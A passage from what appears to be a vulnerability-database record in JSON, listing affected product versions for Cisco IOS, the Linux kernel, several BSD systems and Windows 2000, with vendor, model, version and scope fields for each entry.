            "version": "12.0\\(10\\)w5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1\\)xe"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xp"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.46"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(2\\)t3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(7\\)da"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(2\\)ja"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.11"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(19\\)st"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(12c\\)ec"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.15.7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(11\\)yz2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(3\\)xp"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2sx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1yd"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "4.6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)t5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(16\\)s"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.99"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.10"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(23\\)s2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(28\\)w5-32a"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(17b\\)sxa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(28\\)s3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(22\\)ea4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3db"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)ew5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2sg"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)wc9"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(1\\)dc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)ez"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(26\\)sv"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(22\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.28"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.4"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.9"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "8.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)sxe1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(8\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2xi"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.22.6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(6\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xw"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.10"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)bx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1\\)xs"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.23.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)sw"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.63"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "2.1.0"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": null
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.20"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2sv"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.0.12\\(a\\)bt"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(7.4\\)s"
          },
          {
            "_id": null,
            "model": "windows 2000",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.17"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2xb"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(13\\)wt6\\(1\\)"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "5.2.1"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.25"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.15"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(13\\)e3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(7\\)aa"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(9\\)e3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(20\\)aa4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2ewa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(15\\)sc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xh2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(19\\)sl"
          },
          {
            "_id": null,
            "model": "dragonflybsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dragonflybsd",
            "version": null
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(4\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(9\\)aa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)xr"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(13\\)e17"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)yk"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1d\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(28\\)w5-30b"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(1\\)w"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(12c\\)ew4"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(7\\)xi3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0xu"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(18\\)w5\\(22b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(10\\)ey"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(17\\)s7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(19\\)e"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)cz3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(22\\)e1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(1\\)ex"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.59"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "1.4.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(12.05\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(2\\)xe"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(19\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(26\\)w5\\(28\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)ya"
          },
          {
            "_id": null,
            "model": "dragonflybsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dragonflybsd",
            "version": "1.10.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3\\(11\\)b"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(1b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(20\\)s7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(8\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2xr"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)xl4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(11a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)sxd6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(26\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)jk2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.39"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.0\\(12\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(36\\)ca4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(16\\)p"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1dc"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "2.1.7.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(17a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)t1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(6\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1yh"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)t17"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.68"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.17.9"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.11.4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(7\\)ja"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(20\\)ec"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.45"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yu"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0xh"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4xd"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.51"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(24.2\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(7\\)xr3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.13"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(8\\)ea2b"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(7\\)ca"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.0\\(x\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.27"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4xj"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(23f\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)s4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)t1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.14.6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(11b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13\\)ze"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2yv"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(21\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)ja1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(9a\\)bc7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(13\\)ew"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.16"
          },
          {
            "_id": null,
            "model": "bsd os",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "bsdi",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(11\\)s6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(17\\)ct"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(14\\)e4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(7\\)cx"
          },
          {
            "_id": null,
            "model": "bsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "bsd",
            "version": "4.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1\\)xe3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.49"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(24b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xh"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(17\\)s4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(8\\)t10"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(24c\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(4\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(5b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.1.1"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "0.4_1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(14\\)ym4"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(17d\\)sx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(4\\)xm4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2jx"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.19"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.17"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "1.4.2"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "4.7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(4\\)t2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2wa3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.13.3"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.26"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0xp"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4xp"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.21.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(13a\\)bc"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(8b\\)e20"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)xr2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(3b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)yd"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(13\\)e12"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(2\\)xc3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2zm"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1\\)t"
          },
          {
            "_id": null,
            "model": "catalyst blade switch 3120x",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(50\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(2\\)xc1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.22.16"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)ya2"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
